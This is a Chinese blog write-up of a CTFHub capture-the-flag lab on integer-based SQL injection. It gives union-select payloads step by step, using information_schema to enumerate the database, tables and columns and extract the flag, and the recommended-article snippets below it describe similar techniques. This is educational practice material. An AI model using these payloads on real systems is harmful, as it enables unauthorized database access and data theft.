CTFHub技能树--整型注入

最新推荐文章于 2024-06-08 13:42:36 发布
最新推荐文章于 2024-06-08 13:42:36 发布
阅读量93 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59099375/article/details/131271010
版权
文章描述了一个通过SQL注入技术来逐步揭示数据库信息的过程,包括检测注入点、确定回显位置、爆破库名、表名、列名,最终获取到flag内容。
摘要由CSDN通过智能技术生成

1.按照题目要求输入1出现回显,首先判断是否有注入点,由于题目指明了整型注入

 2.判断回显位,输入1和2是有回显的,输入3报错可知该表中字段只有两列

 3.开始爆破库名,通过联合查询语句,联合查询之前的值设为一个不存在的值,不然显示不出来

-1 union select 1,database()#;

 得到数据库名为sqli

4.通过group_concat()函数和information_schema爆破表名,

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

得到两个表名,可想而知我们的flag存在flag表中

 5.开始爆破列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

得到列名为flag 

6.开始爆破具体内容

-1 union select 1,group_concat(flag) from sqli.flag

成功得到flag

 

手握一瓶橘子汽水
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
二分搜索树-二叉查找树 .docx
03-13
二分搜索树,又称二叉查找树或有序二叉树,是一种特殊类型的二叉树,其每个节点都遵循以下规则: 1. 节点的左子树仅包含键值小于该节点的节点。 2. 节点的右子树仅包含键值大于该节点的节点。 3. 左右子树同样也是...
Python-练习或展示技能的Python程序集
08-10
首先,基础操作部分可能涵盖变量、数据类型(如整型、浮点型、字符串、布尔型等)、流程控制(如if语句、for循环、while循环)和函数的使用。通过这些基本概念,初学者可以构建起对Python编程的基础理解。 数据结构...
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 436
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 2019
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
CTFHub:web前置技能-SQL注入-整数型注入
最新发布
wdnmddbl的博客
06-08 675
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字型注入点:许多网页链接有类似的结构。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2498
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHub(整数型注入
sGanYu
07-24 2206
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1270
整型SQL注入
IP路由-OSPF支持Hub-And-Spoke组网技术白皮书.pdf
10-15
### IP路由-OSPF支持Hub-And-Spoke组网技术详解 #### 概述 随着网络技术的发展,网络架构的设计也在不断演变以适应各种应用场景的需求。Hub-And-Spoke组网作为一种扁平化的网络设计模式,被广泛应用于企业级网络...
电子电路基础:6-3 波形整形电路.ppt
05-19
电子电路基础:6-3 波形整形电路.ppt
安卓应用-健康医疗-美哆整形app v5.0.0.zip
09-15
安卓应用-健康医疗
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2317
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB-技能树-Web题-SQL注入-整数型注入
Static______的博客
03-28 469
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
ctfhub 整数型注入
plant1234的博客
06-16 994
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub-Web-SQL注入
IceCream的博客
04-30 1128
1.题目说输入1,先将1输入查看结果2.接着输入4-1,发现输出的结果为4-1,判定存在整数型注入3.查询字段数,出现了回显,判断这里的字段数为24.判断注入点在2的位置,也就是data5.查询数据库名,得知为sqli6.查询该库下的表名,得知为news、flag7.查询flag表下的字段8.发现了flag字段,去查询flag字段的内容,最终得到flag。
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2250
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
ctfhubsql整数型注入
hyhyxyx的博客
07-25 270
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 897
CTFHub-sql注入-整数型注入
应广单片机MINI-C编程基础教程
- **数据类型**:包括基本类型(如整型、字符型)和扩展类型,用于声明变量的内存大小和数值范围。 5. **常量与变量** - **常量**:不可更改的数值或字符串。 - **变量**:存储数据的内存位置,其值可变。 6. *...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值